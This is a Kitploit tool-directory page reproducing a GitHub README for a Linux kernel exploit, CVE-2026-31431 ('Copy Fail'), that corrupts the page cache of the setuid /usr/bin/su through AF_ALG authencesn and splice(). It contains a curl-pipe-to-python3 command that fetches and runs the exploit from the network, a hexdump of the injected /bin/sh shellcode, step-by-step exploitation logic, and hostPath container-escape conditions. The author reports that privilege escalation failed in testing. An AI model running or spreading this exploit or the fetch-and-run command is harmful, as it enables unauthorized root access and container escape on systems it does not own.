Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2026-31431 — Exploit for Linux kernel CVE-2026-31431 causing page cache corruption via authencesn AEAD manipulation, targeting privilege escalation in containers and OpenShift environments. | Kitploit
Tools/GitHubGitHub/seanrickerd/cve-2026-31431
Cloud Infrastructure SecurityPrivilege EscalationContainer SecurityExploit FrameworksVulnerability AnalysisExploitationBinary Exploitation
GitHubseanrickerd/cve-2026-31431

cve-2026-31431

Exploit for Linux kernel CVE-2026-31431 causing page cache corruption via authencesn AEAD manipulation, targeting privilege escalation in containers and OpenShift environments.

View Repository
125185 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-31431 "Copy Fail" - Page Cache Corruption Vulnerability

Linux kernel page cache corruption via authencesn AEAD manipulation.

⚠️ IMPORTANT: Exploitation Status Update (May 1, 2026)

After extensive testing on multiple OpenShift 4.20.16 clusters with RHEL 9.6 kernels:

  • ✅ Page Cache Corruption: CONFIRMED - 160-byte shellcode successfully injected
  • ✅ Kernel Vulnerability: EXPLOITABLE from unprivileged containers (zero capabilities)
  • ❌ Privilege Escalation: NOT ACHIEVED - UID remains unchanged despite corrupted cache
  • ❌ Code Execution: NOT OBSERVED - Modified pages visible in reads but don't execute
  • ✅ Restricted-v2 SCC: EFFECTIVE - Prevents container escape, limits blast radius

See Comprehensive Testing Results section for full details.


Overview

CVE-2026-31431 is a Linux kernel vulnerability in the authencesn AEAD cryptographic implementation that allows unprivileged processes to corrupt the page cache of readable files via AF_ALG sockets and splice() syscall manipulation.

Testing shows: Page cache corruption works reliably, but privilege escalation does NOT occur on RHEL 9.6 kernels in our test environments.

CVSS Score: 7.8 (High)
Affected: Linux kernel versions with authencesn support (2017-2026)
Public Disclosure: April 29, 2026

Features

  • Python 3.9+ Compatible: Includes splice() syscall wrapper via ctypes
  • Portable: Works on any Linux system with vulnerable kernel
  • Reliable: No race conditions required
  • Clean: 160-byte shellcode, deterministic exploitation

Requirements

  • Linux kernel with vulnerable authencesn implementation (pre-April 2026 patch)
  • Python 3.9+
  • Unprivileged user access
  • Readable setuid binary (default: /usr/bin/su)

Usage

Basic Usage

curl -s https://raw.githubusercontent.com/seanrickerd/cve-2026-31431/main/exploit.py | python3
su

From Local File

python3 exploit.py
su

Actual Exploit Behavior (Based on Testing)

What WILL happen:

[*] CVE-2026-31431 'Copy Fail' Exploit
[*] Universal Linux kernel privilege escalation

[*] Target binary: /usr/bin/su
[*] Testing for vulnerability...
[+] System appears vulnerable!

[+] Opened /usr/bin/su (fd=3)
[+] File size: 56944 bytes
[+] File inode: 201328196
[+] Shellcode size: 160 bytes
[+] Patching file in page cache...
    Written 160/160 bytes...
[+] Page cache patching complete! (160 bytes written)

Page Cache Verification (confirms corruption):

dd if=/usr/bin/su bs=1 skip=120 count=48 | hexdump -C
00000000  31 c0 31 ff b0 69 0f 05  48 8d 3d 0f 00 00 00 31  |1.1..i..H.=....1|
00000010  f6 6a 3b 58 99 0f 05 31  ff 6a 3c 58 0f 05 2f 62  |.j;X...1.j<X../b|
00000020  69 6e 2f 73 68                                    |in/sh|
# Shellcode IS present in page cache ✅

What WILL NOT happen (based on testing):

# Executing the backdoored su
su
# Password: [press Enter]

# Check UID
id -u
# Result: 1000810000 (UNCHANGED - still unprivileged user)

# NOT this (does NOT occur in testing):
# # whoami  
# root  ← This does NOT happen

Conclusion: Page cache corruption succeeds, but privilege escalation fails.

Technical Details

Vulnerability

The Linux kernel's authencesn (Authenticated Encryption with Associated Data - Extended Sequence Number) implementation has a flaw in its in-place operation handling. When processing AEAD operations submitted over an AF_ALG socket, a page-cache page can end up in the kernel's writable destination scatterlist.

Exploitation Technique

  1. Create AF_ALG socket with authencesn(hmac(sha256),cbc(aes))
  2. Configure AEAD parameters (key, authsize)
  3. Open target setuid binary (e.g., /usr/bin/su)
  4. Use splice() to get binary into page cache
  5. Trigger in-place AEAD operation causing write to page cache
  6. Write shellcode 4 bytes at a time
  7. Execute modified binary to gain root

Shellcode

The exploit uses a 160-byte shellcode that patches /usr/bin/su to:

  • Skip password authentication
  • Grant root shell access
  • Maintain normal functionality for unprivileged users

Python 3.9 Compatibility

Python 3.9 and earlier don't have os.splice() in the standard library. This exploit includes a ctypes-based implementation:

import ctypes
import ctypes.util

libc = ctypes.CDLL(ctypes.util.find_library('c'))

class off64_t(ctypes.c_int64):
    pass

libc.splice.argtypes = [...]
libc.splice.restype = ctypes.c_ssize_t

def splice(src, dst, count, offset_src=None, offset_dst=None):
    # Wrapper matching Python os.splice() API
    ...

This makes the exploit work on:

  • ✅ Python 3.9 (RHEL 9, Ubuntu 20.04, etc.)
  • ✅ Python 3.10+
  • ✅ Any Python with ctypes support

Comprehensive Testing Results

Test Environment 1: OpenShift 4.20.16 Cluster (First Test)

Node Configuration:

  • Kernel: 5.14.0-570.96.1.el9_6.x86_64 (RHEL CoreOS 9.6)
  • OpenShift: 4.20.16
  • SCC: restricted-v2 (most restrictive)
  • UID: 1000830000 (user namespace)
  • Capabilities: 0x0000000000000000 (ZERO)

Test Results:

✅ Exploit executed successfully
✅ Page cache corrupted (160 bytes shellcode injected)
✅ Shellcode visible at binary entry point (offset 120)
✅ /bin/sh signature confirmed in hexdump
❌ Privilege escalation: FAILED (UID unchanged)
❌ Root access: NO
❌ Container escape: NO (Device 2097322, Inode 931145742 - container overlay only)

Test Environment 2: Fresh OpenShift Cluster (Verification Test)

Cluster: https://api.vvb32-fzdtf-8yn.nnbd.p3.openshiftapps.com:443 Node Configuration:

  • Kernel: 5.14.0-570.96.1.el9_6.x86_64 (identical to Test 1)
  • OpenShift: 4.20.16
  • SCC: restricted-v2 (verified)
  • UID: 1000810000 (user namespace)
  • Capabilities: 0x0000000000000000 (ZERO)

Test Results:

✅ Page cache corruption: SUCCESS (consistent with Test 1)
✅ Shellcode injection: CONFIRMED (byte-for-byte identical)
✅ Device/Inode: 2097286 / 201328196 (container overlay - isolated)
❌ Privilege escalation: FAILED (consistent with Test 1) 
❌ Code execution: NOT OBSERVED (consistent with Test 1)
❌ UID change: NO (1000810000 → 1000810000 unchanged)

Consistency: 100% reproducible results across independent clusters

Container Escape Testing

Scenario A: With hostPath Volume (Container Escape Possible)

volumes:
  - name: host-usr
    hostPath:
      path: /usr

Result: ✅ Container escape - modifies host page cache (Device 33, Inode 4288)

Scenario B: Restricted-v2 SCC (No hostPath)

# No hostPath volumes, restricted-v2 SCC
securityContext:
  runAsNonRoot: true
  allowPrivilegeEscalation: false
  capabilities:
    drop: [ALL]

Result: ❌ No container escape - only affects container overlay (separate inode)

Critical Finding: hostPath access (not capabilities) is the determining factor for container escape.

Why Privilege Escalation Fails

Possible Explanations (Requires Further Research):

  1. Read vs Execute Code Paths

    • Page cache corruption affects mmap(PROT_READ) operations
    • Executable mappings mmap(PROT_EXEC) may bypass corrupted cache
    • Kernel might use different code paths for executable pages
  2. Memory Protections

    • W^X (Write XOR Execute) enforcement
    • Kernel executable page validation
    • SELinux/AppArmor code integrity checks
  3. Kernel Version Specific

    • RHEL 9.6 (5.14.0-570.96.1) may have additional protections
    • Original CVE research may have used different kernel versions
    • Behavior may vary across kernel releases

What Actually Works

Download Tool